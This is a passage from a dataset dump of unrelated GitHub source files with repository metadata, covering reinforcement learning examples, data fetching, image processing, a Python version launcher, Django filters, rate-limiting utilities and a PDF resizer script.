argparse\nfrom gym.spaces import Discrete\nimport random\n\nfrom ray import tune\nfrom ray.rllib.agents.pg import PGTrainer, PGTFPolicy, PGTorchPolicy\nfrom ray.rllib.agents.registry import get_agent_class\nfrom ray.rllib.examples.env.rock_paper_scissors import RockPaperScissors\nfrom ray.rllib.examples.policy.rock_paper_scissors_dummies import \\\n BeatLastHeuristic, AlwaysSameHeuristic\nfrom ray.rllib.utils.framework import try_import_tf, try_import_torch\nfrom ray.rllib.utils.test_utils import check_learning_achieved\n\ntf = try_import_tf()\ntorch, _ = try_import_torch()\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"--torch\", action=\"store_true\")\nparser.add_argument(\"--as-test\", action=\"store_true\")\nparser.add_argument(\"--stop-iters\", type=int, default=150)\nparser.add_argument(\"--stop-reward\", type=float, default=1000.0)\nparser.add_argument(\"--stop-timesteps\", type=int, default=100000)\n\n\ndef run_same_policy(args, stop):\n \"\"\"Use the same policy for both agents (trivial case).\"\"\"\n config = {\n \"env\": RockPaperScissors,\n \"framework\": \"torch\" if args.torch else \"tf\",\n }\n\n results = tune.run(\"PG\", config=config, stop=stop)\n\n if args.as_test:\n # Check vs 0.0 as we are playing a zero-sum game.\n check_learning_achieved(results, 0.0)\n\n\ndef run_heuristic_vs_learned(args, use_lstm=False, trainer=\"PG\"):\n \"\"\"Run heuristic policies vs a learned agent.\n\n The learned agent should eventually reach a reward of ~5 with\n use_lstm=False, and ~7 with use_lstm=True. 
The reason the LSTM policy\n can perform better is since it can distinguish between the always_same vs\n beat_last heuristics.\n \"\"\"\n\n def select_policy(agent_id):\n if agent_id == \"player1\":\n return \"learned\"\n else:\n return random.choice([\"always_same\", \"beat_last\"])\n\n config = {\n \"env\": RockPaperScissors,\n \"gamma\": 0.9,\n \"num_workers\": 0,\n \"num_envs_per_worker\": 4,\n \"rollout_fragment_length\": 10,\n \"train_batch_size\": 200,\n \"multiagent\": {\n \"policies_to_train\": [\"learned\"],\n \"policies\": {\n \"always_same\": (AlwaysSameHeuristic, Discrete(3), Discrete(3),\n {}),\n \"beat_last\": (BeatLastHeuristic, Discrete(3), Discrete(3), {}),\n \"learned\": (None, Discrete(3), Discrete(3), {\n \"model\": {\n \"use_lstm\": use_lstm\n },\n \"framework\": \"torch\" if args.torch else \"tf\",\n }),\n },\n \"policy_mapping_fn\": select_policy,\n },\n \"framework\": \"torch\" if args.torch else \"tf\",\n }\n cls = get_agent_class(trainer) if isinstance(trainer, str) else trainer\n trainer_obj = cls(config=config)\n env = trainer_obj.workers.local_worker().env\n for _ in range(args.stop_iters):\n results = trainer_obj.train()\n print(results)\n # Timesteps reached.\n if results[\"timesteps_total\"] > args.stop_timesteps:\n break\n # Reward (difference) reached -> all good, return.\n elif env.player1_score - env.player2_score > args.stop_reward:\n return\n\n # Reward (difference) not reached: Error if `as_test`.\n if args.as_test:\n raise ValueError(\n \"Desired reward difference ({}) not reached! Only got to {}.\".\n format(args.stop_reward, env.player1_score - env.player2_score))\n\n\ndef run_with_custom_entropy_loss(args, stop):\n \"\"\"Example of customizing the loss function of an existing policy.\n\n This performs about the same as the default loss does.\"\"\"\n\n def entropy_policy_gradient_loss(policy, model, dist_class, train_batch):\n logits, _ = model.from_batch(train_batch)\n action_dist = dist_class(logits, model)\n if args.torch:\n # required by PGTorchPolicy's stats fn.\n policy.pi_err = torch.tensor([0.0])\n return torch.mean(-0.1 * action_dist.entropy() -\n (action_dist.logp(train_batch[\"actions\"]) *\n train_batch[\"advantages\"]))\n else:\n return (-0.1 * action_dist.entropy() - tf.reduce_mean(\n action_dist.logp(train_batch[\"actions\"]) *\n train_batch[\"advantages\"]))\n\n policy_cls = PGTorchPolicy if args.torch else PGTFPolicy\n EntropyPolicy = policy_cls.with_updates(\n loss_fn=entropy_policy_gradient_loss)\n\n EntropyLossPG = PGTrainer.with_updates(\n name=\"EntropyPG\", get_policy_class=lambda _: EntropyPolicy)\n\n run_heuristic_vs_learned(args, use_lstm=True, trainer=EntropyLossPG)\n\n\nif __name__ == \"__main__\":\n args = parser.parse_args()\n\n stop = {\n \"training_iteration\": args.stop_iters,\n \"timesteps_total\": args.stop_timesteps,\n \"episode_reward_mean\": args.stop_reward,\n }\n\n run_same_policy(args, stop=stop)\n print(\"run_same_policy: ok.\")\n\n run_heuristic_vs_learned(args, use_lstm=False)\n print(\"run_heuristic_vs_learned(w/o lstm): ok.\")\n\n run_heuristic_vs_learned(args, use_lstm=True)\n print(\"run_heuristic_vs_learned (w/ lstm): ok.\")\n\n run_with_custom_entropy_loss(args, stop=stop)\n print(\"run_with_custom_entropy_loss: 
ok.\")\n","repo_name":"HuantWang/SUPERSONIC","sub_path":"third_party/ray/rllib/examples/rock_paper_scissors_multiagent.py","file_name":"rock_paper_scissors_multiagent.py","file_ext":"py","file_size_in_byte":5634,"program_lang":"python","lang":"en","doc_type":"code","stars":119,"dataset":"github-code","pt":"37"} +{"seq_id":"41977779156","text":"# import libraries\nimport numpy as np\nfrom sklearn import datasets, linear_model\nfrom sklearn.metrics import mean_squared_error, r2_score\n\n# load data\ndiabetes = datasets.load_diabetes()\nX = diabetes.data[:, np.newaxis, 2]\n\n# splitting data\nX_train = X[:-30]\nX_test = X[-30:]\ny_train = diabetes.target[:-30]\ny_test = diabetes.target[-30:]\n\n# create model\nLReg = linear_model.LinearRegression()\n\n# train model\nLReg.fit(X_train, y_train)\n\n# make predict\ny_pred = LReg.predict(X_test)\n\n# get report\nprint('Coefficients: \\n', LReg.coef_)\nprint(\"Mean squared error: %.2f\" % mean_squared_error(y_test, y_pred))\nprint('Variance score: %.2f' % r2_score(y_test, y_pred))\n","repo_name":"iamraufodilov/LinaerRegression_ML","sub_path":"LinaerRegression_ML/LinaerRegression_ML.py","file_name":"LinaerRegression_ML.py","file_ext":"py","file_size_in_byte":662,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"23622921927","text":" \r\nimport sys\r\nimport time, json, requests, csv, datetime\r\nimport pandas as pd\r\nimport numpy as np\r\n \r\n \r\nurl=\"https://api.gdax.com\"\r\nproduct_id=\"BTC-USD\"\r\n \r\ntoday = datetime.datetime.now()\r\n\r\n \r\n \r\n \r\ntitles = ('time','low','high','open','close','volume')\r\n\r\n \r\n \r\ndef getProductHistoricRates(product='', start='', end='', granularity=''):\r\n\tpayload = { \"start\" : start, \"end\" : end,\"granularity\" : granularity}\r\n\tresponse = requests.get(url + '/products/%s/candles' % (product), params=payload)\r\n\treturn response.json()\r\n\t \r\n\r\ndef getdata(granul):\r\n\tlenny=1\r\n\tx=0\r\n\ty=0\r\n\tthree_hours = datetime.timedelta(minutes=3*granul)\r\n\tname = 'gdax_'+ str(granul) +'.csv'\r\n\twith open(name,'w') as fd:\r\n\t\t\twriter = csv.writer(fd)\r\n\t\t\twriter.writerow(['time','low','high','open','close','volume'])\r\n\twhile lenny > 0 or y<30:\r\n\t\tx = x + 1\r\n\t\ttdelta = datetime.timedelta(minutes=3 *x *granul)\r\n\t\tendtime = today - tdelta\r\n\t\tstarttime = endtime - three_hours\r\n\t\ttry:\r\n\t\t\tall_data =[]\r\n\t\t\tdata = getProductHistoricRates(product=product_id,start=starttime,end=endtime,granularity=granul)\r\n\t\t\tfor i in data:\r\n\t\t\t\ttry:\r\n\t\t\t\t\tall_data.append(i)\r\n\t\t\t\t\ty = 0\r\n\t\t\t\texcept:\r\n\t\t\t\t\tpass\r\n\t\t\twith open(name,'a') as fd:\r\n\t\t\t\tfor j in all_data:\r\n\t\t\t\t\twriter = csv.writer(fd)\r\n\t\t\t\t\twriter.writerow(j)\r\n\t\t\ty = y + 1\r\n\t\t\tlenny = len(data)\r\n\t\texcept:\r\n\t\t\tpass\r\n\t\tif lenny == 0:\r\n\t\t\ty = y + 1\r\n\t\tprint ('Data:',lenny,'_',starttime,'_',endtime)\r\n\t\ttime.sleep(1)\r\n\r\n\tprint ('y=',y)\r\n\r\n'''\r\nNext, fill in seconds that are missing in the data\r\n'''\r\n#getdata(60)\r\ndirectory = 'C:\\\\Code\\\\btc\\\\Trader\\\\'\r\nname = directory+'gdax_'+ str(60) +'.csv'\r\nprint (name)\r\ndf = pd.read_csv(name,error_bad_lines=False)\r\ndf = pd.DataFrame(df)\r\nprint(df.head())\r\ndf['time']=pd.to_datetime(df['time'],unit='s')\r\nprint (df.head())\r\nprint (len(df))\r\ndf.to_csv(name)\r\nprint 
(name, 'updated at', today)  # starttime/endtime are local to getdata()","repo_name":"themandalore/btc_trader","sub_path":"cb_data.py","file_name":"cb_data.py","file_ext":"py","file_size_in_byte":1839,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"}
+{"seq_id":"32118552468","text":"import cv2\nimport matplotlib.pyplot as plt\nimport numpy as np\n\n\n###############################################################################################\ndef histogram_equalization(image):\n    global histogram\n\n    # Calculate histogram values for grayscale image\n    if len(image.shape) == 2:\n        histogram = np.zeros(8, dtype=int)  # int (not uint8) so bin counts cannot overflow\n        for i in range(image.shape[0]):\n            for j in range(image.shape[1]):\n                histogram[image[i, j]] += 1\n\n        # Calculate running sum\n        running_sum = np.zeros(8, dtype=int)\n        running_sum[0] = histogram[0]\n        for i in range(1, 8):\n            running_sum[i] = running_sum[i - 1] + histogram[i]\n\n        # Calculate histogram equalization\n        pixels_sum = histogram.sum()\n        equalized_values = np.zeros(8, dtype=int)\n        for i in range(8):\n            equalized_values[i] = int(round((7 * running_sum[i]) / pixels_sum))\n\n        # Draw histogram equalization\n        plt.bar(range(8), equalized_values, color='k')\n        # The plt.xlim() function sets the x-axis limits to be between 0 and 8\n        plt.xlim([0, 8])\n        plt.suptitle('Histogram of Gray Image')\n        plt.show()\n\n\n###############################################################################################\n\narr = np.array([[0, 0, 0, 1],\n                [1, 1, 1, 2],\n                [2, 2, 2, 3],\n                [5, 6, 4, 3]])\nhistogram_equalization(arr)\n","repo_name":"M7mdSh3banX/Image-Processing-Assignments","sub_path":"histogram-equalization-lab-example.py","file_name":"histogram-equalization-lab-example.py","file_ext":"py","file_size_in_byte":1438,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"2661446631","text":"import numpy as np\nimport pandas as pd\n\n\ndef expand_data(data): \n    d1 = np.zeros([data.shape[0]*3, data.shape[1], data.shape[2]])\n    \n    for i in range(data.shape[0]):\n        if i >= (data.shape[0] - 2):\n            d1[i*3:(i*3+data.shape[0]-i),:,:] = data[i:,:,:] \n        else:\n            d1[i*3:(i*3)+3,:,:] = data[i:i+3,:,:]\n    \n    \n    d2 = np.zeros([d1.shape[0], d1.shape[1]*3, d1.shape[2]])\n    \n    for j in range(d1.shape[1]):\n        if j >= (d1.shape[1] - 2):\n            d2[:,j*3:(j*3+d1.shape[1]-j),:] = d1[:,j:,:] \n        else:\n            d2[:,j*3:(j*3)+3,:] = d1[:,j:(j+3),:]\n    return d2\n    \ndef preprocess_kernel(data):\n    data1 = np.zeros(data.shape)\n    data2 = np.zeros(data.shape)\n    \n    for i in range(int(data.shape[0]/3)):\n        k = data[(i*3):(i*3+3),:,:]\n        data1[i*3,:,:] = 2*k[0,:,:] - k[1,:,:] - k[2,:,:] \n        data1[i*3+1,:,:] = 2*k[1,:,:] - k[0,:,:] - k[2,:,:]\n        data1[i*3+2,:,:] = 2*k[2,:,:] - k[0,:,:] - k[1,:,:]\n    \n    # column-direction kernel accumulates into data2, so the returned sum\n    # combines both the row-wise and column-wise differences\n    for i in range(int(data.shape[1]/3)):\n        k = data[:,(i*3):(i*3+3),:]\n        data2[:,i*3,:] = 2*k[:,0,:] - k[:,1,:] - k[:,2,:] \n        data2[:,i*3+1,:] = 2*k[:,1,:] - k[:,0,:] - k[:,2,:]\n        data2[:,i*3+2,:] = 2*k[:,2,:] - k[:,0,:] - k[:,1,:]\n    \n    return data1 + data2\n    \n    \n\ndef self_define_cnn_kernel_process(data):\n    '''\n    1. expand data from (x, y, z) to (x*3, y*3, z) (Because Conv2D convolution with stride (3,3) for our preprocess)\n    \n    2. 
3*3 kernel process:\n    \n    [2*V_1 - V_2 - V_3\n     2*V_2 - V_1 - V_3\n     2*V_3 - V_1 - V_2]\n\n    +\n\n    [2*Vt_1 - Vt_2 - Vt_3, 2*Vt_2 - Vt_1 - Vt_3, 2*Vt_3 - Vt_1 - Vt_2]\n    \n    '''\n    #input\n    data_final = np.zeros([data.shape[0], data.shape[1]*3, data.shape[2]*3, data.shape[3]])\n    for i in range(data.shape[0]):\n        d1 = data[i,:,:,:]\n        d1_expand = expand_data(d1)\n        d1_final = preprocess_kernel(d1_expand)\n        data_final[i,:,:,:] = d1_final\n    print(data_final.shape)\n    return data_final","repo_name":"AbnerYang/TII_Wide-Deep_Electricity_Theft_Detection","sub_path":"function.py","file_name":"function.py","file_ext":"py","file_size_in_byte":2052,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"37"}
+{"seq_id":"86507900722","text":"class Student(object):\n\n    @property\n    def score(self):\n        return self._score\n\n    @score.setter\n    def score(self,value):\n        if value<0 or value>100 :\n            raise ValueError(\"score must between 0 and 100\")\n        self._score=value\n\n# @property的实现较为复杂,把一个getter方法变成属性,只要加上@property就可以了,此时,property又创建了另一个装饰器@score.setter,负责吧一个setter方法变成属性赋值\n\ns=Student()\ns.score=60\nprint( s.score)\ns.score=-10\n#定义只读属性,只定义getter方法,不定义setter方法就可以了\n","repo_name":"AnnDWang/python","sub_path":"basic/learn13/using_property.py","file_name":"using_property.py","file_ext":"py","file_size_in_byte":787,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"}
+{"seq_id":"24961395898","text":"import argparse\nimport sys\n\nfrom pylauncher.installer import compile_python, fetch_python, unzip_tar\nfrom pylauncher.launcher import run_python\nfrom pylauncher.config import config\n\n\nclass PyLauncher:\n    \"\"\"An interface to the main CLI\"\"\"\n\n    def __init__(self):\n        self.python_arguments = []  # Arguments to pass onto the python executable\n\n        self.parser = argparse.ArgumentParser(\n            prog=\"pylauncher\", description=\"A python launcher and version manager\"\n        )\n\n        self.parser.add_argument(\n            \"-ls\", \"--list\", help=\"Lists the available python versions\"\n        )\n\n        self.parser.add_argument(\n            \"command\", help=\"Subcommand to run\", nargs=\"?\", default=None\n        )\n\n    def install(self):\n        \"\"\"Installs the provided python version\"\"\"\n\n        parser = argparse.ArgumentParser(\n            prog=\"pylauncher\", description=\"Install the provided python version\"\n        )\n\n        parser.add_argument(\"version\", type=float, help=\"The python version to install\")\n        args, unknown = parser.parse_known_args(sys.argv[2:])\n        version = args.version\n\n        temp_tarpath = fetch_python(\n            version\n        )  # Install the python version from python.org\n        unzip_tar(temp_tarpath)  # Unzip the downloaded tar file\n        compile_python(version)  # Compile the newly downloaded python version\n\n        print(f\"Successfully installed python {version}\")\n\n        self.python_arguments.extend(\n            unknown\n        )  # Add unknown args to be passed onto the main python executable\n\n    def default(self):\n        \"\"\"Sets the default python version, and if not installed, installs it\"\"\"\n\n        parser = argparse.ArgumentParser(\n            prog=\"pylauncher\", description=\"Set the default python version\"\n        )\n\n        parser.add_argument(\n            \"version\", type=float, help=\"The python version to set as the default\"\n        )\n        args, unknown = parser.parse_known_args(sys.argv[2:])\n        version = args.version\n\n        config[\"PYTHON_VERSION\"] = version\n\n        self.python_arguments.extend(\n            unknown\n        )  # Add unknown args to be passed 
onto the main python executable\n\n def run_python(self):\n \"\"\"Launches the python executable\"\"\"\n run_python(*self.python_arguments)\n\n def run(self):\n \"\"\"Runs the argument parser\"\"\"\n\n if len(sys.argv) == 1:\n self.run_python()\n sys.exit(1)\n\n args, unknown = self.parser.parse_known_args(sys.argv[1:])\n self.python_arguments.extend(unknown)\n\n if args.command is None:\n self.run_python()\n return\n\n if not hasattr(self, str(args.command)):\n self.python_arguments.append(args.command)\n self.run_python()\n return\n\n subcommand = getattr(self, args.command) # Dispatch to correct function\n\n subcommand()\n self.run_python()\n","repo_name":"AbooMinister25/pylauncher","sub_path":"pylauncher/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":2936,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"4677969998","text":"import io\nfrom utils import get_complete_df\nimport pypolars as pl\n\n\ndef test_to_from_buffer():\n df = get_complete_df()\n df = df.drop(\"strings_nulls\")\n\n for to_fn, from_fn in zip(\n [df.to_parquet, df.to_csv], [df.read_parquet, df.read_csv]\n ):\n f = io.BytesIO()\n to_fn(f)\n f.seek(0)\n\n df_1 = from_fn(f)\n assert df.frame_equal(df_1, null_equal=True)\n\n\ndef test_read_web_file():\n url = \"https://raw.githubusercontent.com/ritchie46/polars/master/examples/aggregate_multiple_files_in_chunks/datasets/foods1.csv\"\n df = pl.read_csv(url)\n assert df.shape == (27, 4)\n","repo_name":"rich-murphey/polars","sub_path":"py-polars/tests/test_io.py","file_name":"test_io.py","file_ext":"py","file_size_in_byte":621,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"37"} +{"seq_id":"25607961543","text":"from pymongo import MongoClient\r\n\r\n\r\nclient = MongoClient('localhost', 27017)\r\n# 连接test数据库,没有则自动创建\r\ndb = client.test\r\n# 使用zyp集合,没有则自动创建\r\nmy_set = db.zyp\r\n\r\nmy_set.insert_one({\"name\":\"carina\",\"age\":18,\"job\":\"software test\"})\r\n","repo_name":"teddy-mc/python","sub_path":"Teddy--MongoDB和Python.py","file_name":"Teddy--MongoDB和Python.py","file_ext":"py","file_size_in_byte":275,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"31815080049","text":"from django import template\nfrom datetime import datetime\nfrom django.utils.timezone import utc\nimport re\n\nregister = template.Library()\n\n# фильтр, возвращающий значение переменной\n@register.filter()\ndef show(value):\n return f'{value}'\n\n# фильтр изменения формата даты\n@register.filter()\ndef date_format(value):\n return datetime.strftime(value, '%d-%b-%Y')\n\n\n# фильтр цензурирования\n@register.filter()\ndef censor(text):\n if isinstance(text, str):\n # список нежелательных слов\n cens_list = ['редиска', 'чудак']\n\n filter_text = re.split(r\"\\W\", text)\n for word in filter_text:\n if word in cens_list:\n cens_word = word[0] + '*' * (len(word) - 1)\n text = text.replace(word, cens_word)\n return text\n else:\n print(f'Переменная {text} не может быть обработана, так как не является строкой :(')\n","repo_name":"kulstas/moykotel","sub_path":"moykotel/templatetags/custom_filters.py","file_name":"custom_filters.py","file_ext":"py","file_size_in_byte":1051,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"8330126571","text":"# =============================================================================\n# Minet Utils\n# 
=============================================================================\n#\n# Miscellaneous helper function used throughout the library.\n#\nimport re\nimport hashlib\nimport json\nimport yaml\nimport time\nimport string\nimport functools\nimport dateparser\nfrom random import uniform\n\nfrom minet.exceptions import DefinitionInvalidFormatError\n\n\ndef noop(*args, **kwargs):\n pass\n\n\ndef fuzzy_int(value):\n try:\n return int(value)\n except ValueError:\n return int(float(value))\n\n\ndef md5(string):\n h = hashlib.md5()\n h.update(string.encode())\n return h.hexdigest()\n\n\nDOUBLE_QUOTES_RE = re.compile(r'\"')\n\n\ndef fix_ensure_ascii_json_string(s):\n try:\n return json.loads('\"%s\"' % DOUBLE_QUOTES_RE.sub('\\\\\"', s))\n except json.decoder.JSONDecodeError:\n return s\n\n\nclass RateLimiter(object):\n \"\"\"\n Naive rate limiter context manager with smooth output.\n\n Note that it won't work in a multi-threaded environment.\n\n Args:\n max_per_period (int): Maximum number of calls per period.\n period (float): Duration of a period in seconds. Defaults to 1.0.\n\n \"\"\"\n\n def __init__(self, max_per_period, period=1.0, with_budget=False):\n max_per_second = max_per_period / period\n self.min_interval = 1.0 / max_per_second\n self.max_budget = period / 4\n self.budget = 0.0\n self.last_entry = None\n self.with_budget = with_budget\n\n def enter(self):\n self.last_entry = time.perf_counter()\n\n def __enter__(self):\n return self.enter()\n\n def exit_with_budget(self):\n running_time = time.perf_counter() - self.last_entry\n\n delta = self.min_interval - running_time\n\n # Consuming budget\n if delta >= self.budget:\n delta -= self.budget\n self.budget = 0\n else:\n self.budget -= delta\n delta = 0\n\n # Do we need to sleep?\n if delta > 0:\n time.sleep(delta)\n elif delta < 0:\n self.budget -= delta\n\n # Clamping budget\n # TODO: this should be improved by a circular buffer of last calls\n self.budget = min(self.budget, self.max_budget)\n\n def exit(self):\n running_time = time.perf_counter() - self.last_entry\n\n delta = self.min_interval - running_time\n\n if delta > 0:\n time.sleep(delta)\n\n def __exit__(self, exc_type, exc_value, exc_traceback):\n if self.with_budget:\n return self.exit_with_budget()\n\n return self.exit()\n\n\nclass RetryableIterator(object):\n \"\"\"\n Iterator exposing a #.retry method that will make sure the next item\n is the same as the current one.\n \"\"\"\n\n def __init__(self, iterator):\n self.iterator = iter(iterator)\n self.current_value = None\n self.retried = False\n self.retries = 0\n\n def __iter__(self):\n return self\n\n def __next__(self):\n if self.retried:\n self.retried = False\n return self.current_value\n\n self.retries = 0\n self.current_value = next(self.iterator)\n return self.current_value\n\n def retry(self):\n self.retries += 1\n self.retried = True\n\n\nclass RateLimitedIterator(object):\n \"\"\"\n Handy iterator wrapper that will yield its items while respecting a given\n rate limit and that will not sleep needlessly when the iterator is\n finally fully consumed.\n \"\"\"\n\n def __init__(self, iterator, max_per_period, period=1.0):\n self.iterator = RetryableIterator(iterator)\n self.rate_limiter = RateLimiter(max_per_period, period)\n self.empty = False\n\n try:\n self.next_value = next(self.iterator)\n except StopIteration:\n self.next_value = None\n self.empty = True\n\n @property\n def retries(self):\n return self.iterator.retries\n\n def retry(self):\n return self.iterator.retry()\n\n def __iter__(self):\n if 
self.empty:\n            return\n\n        while True:\n            self.rate_limiter.enter()\n\n            yield self.next_value\n\n            # NOTE: if the iterator is fully consumed, this will raise StopIteration\n            # and skip the exit part that could sleep needlessly\n            try:\n                self.next_value = next(self.iterator)\n            except StopIteration:\n                return\n\n            self.rate_limiter.exit()\n\n\nclass RateLimiterState(object):\n    def __init__(self, max_per_period, period=1.0):\n        max_per_second = max_per_period / period\n        self.min_interval = 1.0 / max_per_second\n        self.last_entry = None\n\n    def wait_if_needed(self):\n        if self.last_entry is None:\n            return\n\n        running_time = time.perf_counter() - self.last_entry\n        delta = self.min_interval - running_time\n\n        if delta > 0:\n            time.sleep(delta)\n\n    def update(self):\n        self.last_entry = time.perf_counter()\n\n\ndef rate_limited(max_per_period, period=1.0):\n    state = RateLimiterState(max_per_period, period)\n\n    def decorate(fn):\n\n        @functools.wraps(fn)\n        def decorated(*args, **kwargs):\n            state.wait_if_needed()\n            result = fn(*args, **kwargs)\n            state.update()\n\n            return result\n\n        return decorated\n\n    return decorate\n\n\ndef rate_limited_from_state(state):\n    def decorate(fn):\n\n        @functools.wraps(fn)\n        def decorated(*args, **kwargs):\n            state.wait_if_needed()\n            result = fn(*args, **kwargs)\n            state.update()\n\n            return result\n\n        return decorated\n\n    return decorate\n\n\ndef rate_limited_method(attr='rate_limiter_state'):\n    def decorate(fn):\n\n        @functools.wraps(fn)\n        def decorated(self, *args, **kwargs):\n            state = getattr(self, attr)\n\n            if not isinstance(state, RateLimiterState):\n                raise ValueError\n\n            state.wait_if_needed()\n            result = fn(self, *args, **kwargs)\n            state.update()\n\n            return result\n\n        return decorated\n\n    return decorate\n\n\nclass PseudoFStringFormatter(string.Formatter):\n    def get_field(self, field_name, args, kwargs):\n        result = eval(field_name, None, kwargs)\n\n        return result, None\n\n\ndef load_definition(f, encoding='utf-8'):\n    string_path = isinstance(f, str)\n\n    if string_path:\n        path = f\n        f = open(path, encoding=encoding)\n    else:\n        path = f.name\n\n    if path.endswith('.json'):\n        definition = json.load(f)\n\n    elif path.endswith('.yml') or path.endswith('.yaml'):\n        definition = yaml.safe_load(f)\n\n    else:\n        raise DefinitionInvalidFormatError\n\n    if string_path:\n        f.close()\n\n    return definition\n\n\ndef nested_get(path, o, default=None):\n    if isinstance(path, str):\n        path = path.split('.')\n\n    for step in path:\n        try:\n            if callable(getattr(o, '__getitem__', None)):\n                o = o[step]\n            else:\n                o = getattr(o, step)\n        except (IndexError, KeyError, AttributeError):\n            return default\n\n    return o\n\n\ndef sleep_with_entropy(seconds, max_random_addendum):\n    random_addendum = uniform(0, max_random_addendum)\n    time.sleep(seconds + random_addendum)\n\n\nINTERVALS = [\n    ('weeks', 60 * 60 * 24 * 7),  # 60 * 60 * 24 * 7\n    ('days', 60 * 60 * 24),  # 60 * 60 * 24\n    ('hours', 60 * 60),  # 60 * 60\n    ('minutes', 60),\n    ('seconds', 1)\n]\n\n\ndef prettyprint_seconds(seconds, granularity=None):\n    result = []\n\n    for name, count in INTERVALS:\n        value = seconds // count\n\n        if value:\n            seconds -= value * count\n\n            if value == 1:\n                name = name.rstrip('s')\n\n            result.append('%i %s' % (value, name))\n\n    if not result:\n        return '%.2f seconds' % seconds\n\n    if granularity is not None:\n        result = result[:granularity]\n\n    return ', '.join(result)\n\n\ndef parse_date(formatted_date, lang='en'):\n    try:\n        parsed = dateparser.parse(\n            formatted_date,\n            languages=[lang]\n        )\n    except ValueError:\n        return None\n\n    return 
parsed.isoformat().split('.', 1)[0]\n","repo_name":"lebelgique/minet","sub_path":"minet/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":8260,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"37"} +{"seq_id":"7880229550","text":"class Solution:\n def str2tree(self, s):\n # Find (, then find end of left tree. The right tree starts after that.\n begin_of_left = s.find(\"(\")\n if begin_of_left < 0:\n # Either all num or none.\n return TreeNode(int(s)) if s else None\n # Now find the end of the left tree.\n paren_count = 0\n index = begin_of_left\n while index < len(s):\n if s[index] == \"(\":\n paren_count +=1\n elif s[index] == \")\":\n paren_count -= 1\n if paren_count == 0:\n break\n index += 1\n\n end_of_left = index\n left_indices = begin_of_left+1, end_of_left\n right_indices = end_of_left + 2, -1\n left_tree = self.str2tree(s[left_indices[0]: left_indices[1]])\n right_tree = self.str2tree(s[right_indices[0]: right_indices[1]])\n # Note that the left and right trees are without the () that wraps around them.\n root = TreeNode(int(s[:begin_of_left]))\n root.left = left_tree\n root.right = right_tree\n return root","repo_name":"YihaoGuo2018/leetcode_python_2","sub_path":"Construct Binary Tree from String.py","file_name":"Construct Binary Tree from String.py","file_ext":"py","file_size_in_byte":1207,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"15036541364","text":"import os\nimport fnmatch\nimport shutil\nimport PyPDF2\nfrom pathlib import Path\n\n# Enter your directories here. Use absolute paths.\nsource_directory = Path(\"path/to/zip\") # Where zip file is located\n\n\ndef check_directory():\n if not os.path.exists(source_directory):\n raise Exception(\"The specified source directory does not exist. 
Please check your spelling and try again:\"\n \"{}\".format(source_directory))\n\n\ndef create_directories(root_directory):\n global unzipping_directory\n global pickup_directory\n os.mkdir(os.path.join(root_directory, 'drop-area'))\n os.mkdir(os.path.join(root_directory, 'pickup-area'))\n unzipping_directory = os.path.join(root_directory, 'drop-area')\n pickup_directory = os.path.join(root_directory, 'pickup-area')\n\n\ndef unzip_to_new_directory(start_directory, end_directory):\n pattern = \"*.zip\"\n for root, dirs, files in os.walk(os.path.abspath(start_directory)):\n for filename in fnmatch.filter(files, pattern):\n shutil.unpack_archive(os.path.join(root, filename), end_directory)\n\n\ndef scale(pdf_path, final_path):\n for file in os.listdir(pdf_path):\n print(file)\n pdf_file_obj = open(os.path.join(pdf_path, file), 'rb')\n pdf_reader = PyPDF2.PdfFileReader(pdf_file_obj)\n pdf_writer = PyPDF2.PdfFileWriter() # We will be writing to a new file with scaled dimensions\n\n for page in range(pdf_reader.numPages):\n page_obj = pdf_reader.getPage(page)\n page_obj.scaleTo(612, 792) # Measured in points, multiply by 72 for inches\n pdf_writer.addPage(page_obj)\n\n new_file = open(os.path.join(final_path, file), 'wb')\n pdf_writer.write(new_file)\n pdf_file_obj.close()\n new_file.close()\n\n\ndef zip_folder(zip_this_directory):\n shutil.make_archive(os.path.join(source_directory, 'archive'), 'zip', zip_this_directory)\n\n\ndef remove_leftover_files():\n shutil.rmtree(unzipping_directory)\n shutil.rmtree(pickup_directory)\n\n\nif __name__ == '__main__':\n check_directory()\n create_directories(source_directory)\n unzip_to_new_directory(source_directory, unzipping_directory)\n scale(unzipping_directory, pickup_directory)\n zip_folder(pickup_directory)\n remove_leftover_files()\n print('Complete')\n","repo_name":"wesleykruger/pdf-resizer","sub_path":"resize_files.py","file_name":"resize_files.py","file_ext":"py","file_size_in_byte":2301,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"20008675433","text":"import cv2\r\nimport numpy as np\r\n\r\ntheta = 25 * np.pi / 180\r\nimg = cv2.imread(\"/home/magic/data_dl/tdmc_objs/td_all/JPEGImages/miner_00269.jpg\")\r\n\r\n# x轴的剪切shear变换,角度45°\r\nM_shear = np.array([\r\n [1, -np.tan(theta), 0],\r\n [0, 1, 0]\r\n], dtype=np.float32)\r\n\r\nimg_sheared = cv2.warpAffine(img, M_shear, (1000, 1500), cv2.INTER_LINEAR, borderMode=cv2.BORDER_CONSTANT, borderValue=255)\r\ncv2.imwrite('img_sheared.jpg', img_sheared)\r\n\r\nM_rotate = np.array([\r\n [np.cos(-theta), -np.sin(-theta), 0],\r\n [np.sin(-theta), np.cos(-theta), 0]\r\n], dtype=np.float32)\r\n\r\nimg_rotated = cv2.warpAffine(img_sheared, M_rotate, (800, 1200), cv2.INTER_LINEAR, borderMode=cv2.BORDER_CONSTANT, borderValue=255)\r\ncv2.imwrite('img_rotated.jpg', 